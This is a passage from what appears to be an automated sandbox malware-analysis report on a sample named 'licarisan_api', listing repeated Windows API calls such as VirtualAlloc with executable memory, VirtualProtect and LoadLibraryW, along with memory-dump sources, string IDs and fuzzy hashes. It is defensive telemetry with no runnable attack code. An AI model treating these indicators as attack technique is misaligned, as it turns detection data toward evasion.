                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: 85AJ$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-778880938
                                    • Opcode ID: 23f6ac11d3358f9453fade8d292043e6be5301b448d38bc5e031027f77ebe6f2
                                    • Instruction ID: e531459bb6c2181dabea82323fe613672b56a4796bddae6703a852d0223b8de5
                                    • Opcode Fuzzy Hash: 23f6ac11d3358f9453fade8d292043e6be5301b448d38bc5e031027f77ebe6f2
                                    • Instruction Fuzzy Hash: 4391B4A1D042A89FE721CA24DC05BAABB79EF96300F0441FAD44DA7681D7BD5FC18F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$M2DM$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-3382654
                                    • Opcode ID: de4ed013adcdd0794cec4b04884ca9f940f325b3f300a8004b7ba5e87a8e3f39
                                    • Instruction ID: 03462151c1f0bd0444d23a5fea947dbce75a1d5b6e9bf56f61ee544fad5d6715
                                    • Opcode Fuzzy Hash: de4ed013adcdd0794cec4b04884ca9f940f325b3f300a8004b7ba5e87a8e3f39
                                    • Instruction Fuzzy Hash: EC7192A1D042A88BE721CB24DC057AABB75EF96300F0481FAD44DAB681D7BD5BD18F52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: eff7e8f9e7d2d41a2d7a6f9fccf9b4f7df46648db9669baf2ecc79c767516fcf
                                    • Instruction ID: 085e7ad523604c76b70116de714897c63f849b191a9e6cb7c9a355783c11d18e
                                    • Opcode Fuzzy Hash: eff7e8f9e7d2d41a2d7a6f9fccf9b4f7df46648db9669baf2ecc79c767516fcf
                                    • Instruction Fuzzy Hash: ABA190A1D042988FE721CA24DC05BAABA75EF96300F0081FAD44DA7681D7BD5FC68F52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 155a888f732e2cf90f19d1992b5da9ee7e27eefd79c943f6106e1ca72d97dc81
                                    • Instruction ID: c7e412f2e0ec97d9dd43e3dc9d3485e9742a8a641ae623ce984e961deac50349
                                    • Opcode Fuzzy Hash: 155a888f732e2cf90f19d1992b5da9ee7e27eefd79c943f6106e1ca72d97dc81
                                    • Instruction Fuzzy Hash: 53A190A1D042988FE721CA24DC45BAABB79EF96300F0081FAD44DA7681D7BD5FC58F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 7901f6e022bc6f8cb17126ecaee4748e664063da59d7f1f89220ef1598ec6811
                                    • Instruction ID: 590327bc9a3f8ca6ce14e9b1f84fa6be9d1d4d42032c896e37b4e7bd6083f5b4
                                    • Opcode Fuzzy Hash: 7901f6e022bc6f8cb17126ecaee4748e664063da59d7f1f89220ef1598ec6811
                                    • Instruction Fuzzy Hash: 9BA192A1D042989FE721CB14DC05BAABB75EF96300F0081FAD44DA7681D7BD5EC58F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 140ec3b85cf0fd9f74505b35067b0b48caf1d82e1fde5a73a743d5aa68b74f0a
                                    • Instruction ID: b268ab5c110f7f2e9d46b29689c45730363c2cbdeb28fe5fa6fae24220e3c243
                                    • Opcode Fuzzy Hash: 140ec3b85cf0fd9f74505b35067b0b48caf1d82e1fde5a73a743d5aa68b74f0a
                                    • Instruction Fuzzy Hash: 98A191A1D042988FE721CA24DC05BAABB79EF96300F0081FAD44DA7681D7BD5FC58F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 54733a29b3106ae1dbdffa3bb1788defd4178ce2171f2775dceec36737d54711
                                    • Instruction ID: d39731cd10bc5027b4e547b795857bab911c17605b5751d427c1e53d8407e215
                                    • Opcode Fuzzy Hash: 54733a29b3106ae1dbdffa3bb1788defd4178ce2171f2775dceec36737d54711
                                    • Instruction Fuzzy Hash: 2C81A2A1D042A88BE721CB24DC057EABB79EF96300F0481FAD44DA7681D6BD5FC18F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: d1f8e6eb12f0bad719aff781eb322c12d3d9a848e8b5901f9ee64959e3b57f38
                                    • Instruction ID: 5f95ff55ce789fd47c2a5f9e96d24a2e36d979797a29221a74481c96a9866ddf
                                    • Opcode Fuzzy Hash: d1f8e6eb12f0bad719aff781eb322c12d3d9a848e8b5901f9ee64959e3b57f38
                                    • Instruction Fuzzy Hash: D08160A1E042A88FE721CB24DC057AABB75EF96300F0481FAD44DA7681D7BD5BD18F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 378a57f07455c2ae2e39ef6f8b50597b1bba7d58380272705faeea97eb8b810b
                                    • Instruction ID: c9ffa198a1dcfc4929fd1503ab321a1e8a4f73a1d684130829fdc65c5ff8c5d7
                                    • Opcode Fuzzy Hash: 378a57f07455c2ae2e39ef6f8b50597b1bba7d58380272705faeea97eb8b810b
                                    • Instruction Fuzzy Hash: 038170A1E042A88FE721CB24DC057AABB75EF96300F0081FAD44DA7681D7BD5BD18F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 13b88bec2a84d3e17a761713cc4f761413e2f569f75df67eaea74bf6704ccfb8
                                    • Instruction ID: d0349d9a56cbdf954737a60e8621e534ca739178fcb75aff852d98f9fd8c6222
                                    • Opcode Fuzzy Hash: 13b88bec2a84d3e17a761713cc4f761413e2f569f75df67eaea74bf6704ccfb8
                                    • Instruction Fuzzy Hash: CF8170A1E042A88FE721CB24DC057AABB75EF96300F0081FAD44DA7681D7BD5BD18F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 73e150148d63bc46cac6940ed79fae621a8b402b12665e32c42d3b3043d7b2dc
                                    • Instruction ID: 452fece6b3b4d6655650e53adbde8c6203dbaf159150dfecf47d058b22672716
                                    • Opcode Fuzzy Hash: 73e150148d63bc46cac6940ed79fae621a8b402b12665e32c42d3b3043d7b2dc
                                    • Instruction Fuzzy Hash: 7B8170A1E042A88FE725CB24DC057AABB75EF96300F0081FAD44DA7681D7BD5BD18F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 6becd6adb7e552c2b6ed888cc474c9cc23616bacffe3f109e81fc6e26bed4237
                                    • Instruction ID: 676b2587a3376b01d62230152333cd638ff4d94446436a0ae730cb9825a159ab
                                    • Opcode Fuzzy Hash: 6becd6adb7e552c2b6ed888cc474c9cc23616bacffe3f109e81fc6e26bed4237
                                    • Instruction Fuzzy Hash: 4D8192A1D042A88BE721CB24DC057AABB75EF96300F0481FAD44DAB681D7BD5BD18F52
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: ebf909719b9e7c46baebf3a4ca558fdfa9796b5f4b92d76a3b0821958d651c6e
                                    • Instruction ID: f0f26c890e3188f376f4735703a28c6d4fa34bc7826af27d2d91deedbb62b7ea
                                    • Opcode Fuzzy Hash: ebf909719b9e7c46baebf3a4ca558fdfa9796b5f4b92d76a3b0821958d651c6e
                                    • Instruction Fuzzy Hash: 0C81A3A1D042A88FE721CB24DC057EABB75EF96300F0041FAD44DAB681D6BD5BD58F52
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID: $MD7L
                                    • API String ID: 1263568516-2422098246
                                    • Opcode ID: ac9948482453c748f5dc05093e8cc5f8d6601c6b40e742922108a19c4732c76a
                                    • Instruction ID: 2dd5c82f20939a7197667997628abcfed24924a67eeb3396d0be1803efa5e38e
                                    • Opcode Fuzzy Hash: ac9948482453c748f5dc05093e8cc5f8d6601c6b40e742922108a19c4732c76a
                                    • Instruction Fuzzy Hash: 01318271F01718ABEB35CE64DC44BAAB774FB89711F2042E9E50DA7280C678AEC08F11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: _S
                                    • API String ID: 544645111-1526738568
                                    • Opcode ID: 4e30d84ef595cf18db3447335625be39088a31f56854b312d37e13b517b5b340
                                    • Instruction ID: 1e1227318c5fc6ef8ea438d521fa81efde988f7953dcc775265eb448653b2cb7
                                    • Opcode Fuzzy Hash: 4e30d84ef595cf18db3447335625be39088a31f56854b312d37e13b517b5b340
                                    • Instruction Fuzzy Hash: 784149F2D041589FE7159A24CC88AEA7B78EB45310F1441FEE94D9B381D63C6A81CF61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PH65
                                    • API String ID: 0-1265588624
                                    • Opcode ID: 3fc338ec14f9f95053cbbb53bda921ac1aedb34cbc0f5aa44924b36dae5e3710
                                    • Instruction ID: 98e146a947188c5e119d003d2c32a1c65ed4ac142453b4591f15876feb5b4386
                                    • Opcode Fuzzy Hash: 3fc338ec14f9f95053cbbb53bda921ac1aedb34cbc0f5aa44924b36dae5e3710
                                    • Instruction Fuzzy Hash: 6151C7B1D052549FE795CB20DCA9BBA7B78EB44310F1081EFD50A9A281DB7C5AC1CF12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: PH65
                                    • API String ID: 544645111-1265588624
                                    • Opcode ID: 4225ee0aefac708ac742df26d17d90c57da3901ae9c22056b4c809fa4258b3bc
                                    • Instruction ID: 733ed04356ffb897231b867bb4cfe44b730fccc2d45e32a5963a7634cc8faea1
                                    • Opcode Fuzzy Hash: 4225ee0aefac708ac742df26d17d90c57da3901ae9c22056b4c809fa4258b3bc
                                    • Instruction Fuzzy Hash: BC4183B1D042189FE7A5CB10DCA5BBA7774EB84314F1081EFD54A9A281DB7C6EC18F52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: _S
                                    • API String ID: 544645111-1526738568
                                    • Opcode ID: 1d3490f960da272b8aa10475eed0ee8c704a1824c289de6736dbe7b83676a8b5
                                    • Instruction ID: b0dcae1a90b2608c152b7b47d4b8be977294263582c5e98b927d5151fe9e7169
                                    • Opcode Fuzzy Hash: 1d3490f960da272b8aa10475eed0ee8c704a1824c289de6736dbe7b83676a8b5
                                    • Instruction Fuzzy Hash: 0431F3F3D041649BF7249A14DC88BEB7678EB40314F1541BAE90DAA381D63DAE858F91
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-399585960
                                    • Opcode ID: 49d25d6352dc79f7c2c12cdd3839f3b9b7167456abc41ddbc4dcf29ebaed7ab0
                                    • Instruction ID: 56d21dc33a467d3fa1317ada5b50cb653418c953da08e43c300a83135ec529ff
                                    • Opcode Fuzzy Hash: 49d25d6352dc79f7c2c12cdd3839f3b9b7167456abc41ddbc4dcf29ebaed7ab0
                                    • Instruction Fuzzy Hash: 6641C3B4E052298FEB24CF05D880BA9B7B6FF89318F1081DAD88967351D735AE918F54
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: N23I
                                    • API String ID: 621844428-2248891880
                                    • Opcode ID: 2e98b78d61cab58bb5cc3ac966f0ea52bc3588fe378bde3af44cf5a9546e9f96
                                    • Instruction ID: bfa9666d2d7158a92ad346b01f662cc8bbd1a2a43832b48fd15f412a3befe94a
                                    • Opcode Fuzzy Hash: 2e98b78d61cab58bb5cc3ac966f0ea52bc3588fe378bde3af44cf5a9546e9f96
                                    • Instruction Fuzzy Hash: 8C31D1F1C046199AFB308A11DC85BFE7775EB48311F1481EBD88961680DA3C5EC6DE12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: N23I
                                    • API String ID: 621844428-2248891880
                                    • Opcode ID: ecb000227b2d152e318c20b3ce5df5fb8d0648545da7612776343eb04cfb6ad9
                                    • Instruction ID: 37be6bd51d6d82ef75363c9c0ed6d6db5536edc6c582e880a23975268ed9e52d
                                    • Opcode Fuzzy Hash: ecb000227b2d152e318c20b3ce5df5fb8d0648545da7612776343eb04cfb6ad9
                                    • Instruction Fuzzy Hash: 7811A5F2C045046AF7258A21DC46BFF6639EB84710F14C1BBE50995690E93C5EC64922
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-399585960
                                    • Opcode ID: 7c4efc74a92b83e83be866d9d434d7bbb205d0840e4df92d0dda7d0312292560
                                    • Instruction ID: 483339ee49c993c7a4aec668c1cfd450f0aafba8f8482ea8212fcdb08ee332f7
                                    • Opcode Fuzzy Hash: 7c4efc74a92b83e83be866d9d434d7bbb205d0840e4df92d0dda7d0312292560
                                    • Instruction Fuzzy Hash: F6B14D71E05228DBDB25CB14CC94BAAB7B5FB8A311F1082EAD94D67641C7386EC1CF41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-399585960
                                    • Opcode ID: 9dce0f81928b1aa4b9cbb6527ce6c8dbabc1c9c30534fae873243628068cd636
                                    • Instruction ID: c10a7fcd8cca9d2d3cd9c8f01d5a7af49983d4f5850362fdd6b4bd01111a8bdc
                                    • Opcode Fuzzy Hash: 9dce0f81928b1aa4b9cbb6527ce6c8dbabc1c9c30534fae873243628068cd636
                                    • Instruction Fuzzy Hash: B1A1F4B1E00628DBEB248B14DC54BEAB774EF85311F1082EAE50D66281E73C5EC5CF62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: cfc01cfd0eab6363b5896ee5fd9a566f3b1f60674a566719aea0e5f569aafc5d
                                    • Instruction ID: f783684de05f185fb7106a6708b9a399acd5d96c393b8680fd2b87f9668c6287
                                    • Opcode Fuzzy Hash: cfc01cfd0eab6363b5896ee5fd9a566f3b1f60674a566719aea0e5f569aafc5d
                                    • Instruction Fuzzy Hash: 8191C3A1D096A88BEB24CB24CC447EA7775EF91300F0481E9D44DA7642EA7E5FC5CF62
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 327e200dd1b9adfa4ee0195adaa2a722327906017388ba0296ce51534a272ac4
                                    • Instruction ID: 57c27f79da152d7a99798d012e66f4a6d2fc6cac88f91f48822cd06cfbc64365
                                    • Opcode Fuzzy Hash: 327e200dd1b9adfa4ee0195adaa2a722327906017388ba0296ce51534a272ac4
                                    • Instruction Fuzzy Hash: FD91C4B1D096A88BEB24CB24CC447EAB774EF55300F0481E9D44DA7642EA7A5FC5CF62
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 9d8b1b91ccc6a5f0a21ac15ba371959575c5b51ff6d683a2b1d193e517e3f5ed
                                    • Instruction ID: 7d90fbbcb4f2930aa0187012d922eb004231f85c09744512eac220a65f8f3672
                                    • Opcode Fuzzy Hash: 9d8b1b91ccc6a5f0a21ac15ba371959575c5b51ff6d683a2b1d193e517e3f5ed
                                    • Instruction Fuzzy Hash: 3091C4B1C096A88BEB24CB24CC447EAB774EF55300F0481E9D44DA7642EA3A5FC5CF62
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 4b2023a4ad0de6dacfccbafd2e2da2e9e60689f1d26258392b1a4a6ea50a2507
                                    • Instruction ID: e1776c682cc09b09dd1bd8f70d8d6c028e208327a48043861f6e404ff69d4ee6
                                    • Opcode Fuzzy Hash: 4b2023a4ad0de6dacfccbafd2e2da2e9e60689f1d26258392b1a4a6ea50a2507
                                    • Instruction Fuzzy Hash: BD91C4B1C096A88BEB24CB24CC447EA7775EF51300F0481E9D44DA7642EA3A5FC5CF62
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 5f7b29cf8a9009d3d052daa7d879da056e34fcf478277d5d10b17f73eab7fa7c
                                    • Instruction ID: 5abd2e3c3cc54acfaa1c32f94a9773861534120657f285b0ecf0cf638b56257b
                                    • Opcode Fuzzy Hash: 5f7b29cf8a9009d3d052daa7d879da056e34fcf478277d5d10b17f73eab7fa7c
                                    • Instruction Fuzzy Hash: 1191C4B1C096A88BEB24CB24CC447EA7775EF91300F0481E9D44DA7642EA3A5FC5CF62
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 5d452b159ebb6c52f4733c39274c8950cc467a1a64a8f802071f265faae025ca
                                    • Instruction ID: 1d6b8aab39f5475653e11a2d369e3b68141acb0cbcca2a11d152cad0e3cc197a
                                    • Opcode Fuzzy Hash: 5d452b159ebb6c52f4733c39274c8950cc467a1a64a8f802071f265faae025ca
                                    • Instruction Fuzzy Hash: 0A71D2B1E04218ABEB25CB14DC44BFAB7B5FB89311F2082E9E54D67680D6395EC1CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: e53a4ef92664cffe01a7f65f541101bd7368b2b8bde171bee6fc2f7aafd7f40f
                                    • Instruction ID: 1454df68315c955358c5cefdc6ac18620cbc22f130af90f8b43ad52f406ec6be
                                    • Opcode Fuzzy Hash: e53a4ef92664cffe01a7f65f541101bd7368b2b8bde171bee6fc2f7aafd7f40f
                                    • Instruction Fuzzy Hash: 7C61D4B5E04218AAEB25CF24DC447FAB7B4FB89301F2082EAE50D67680D6395EC1CF51
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
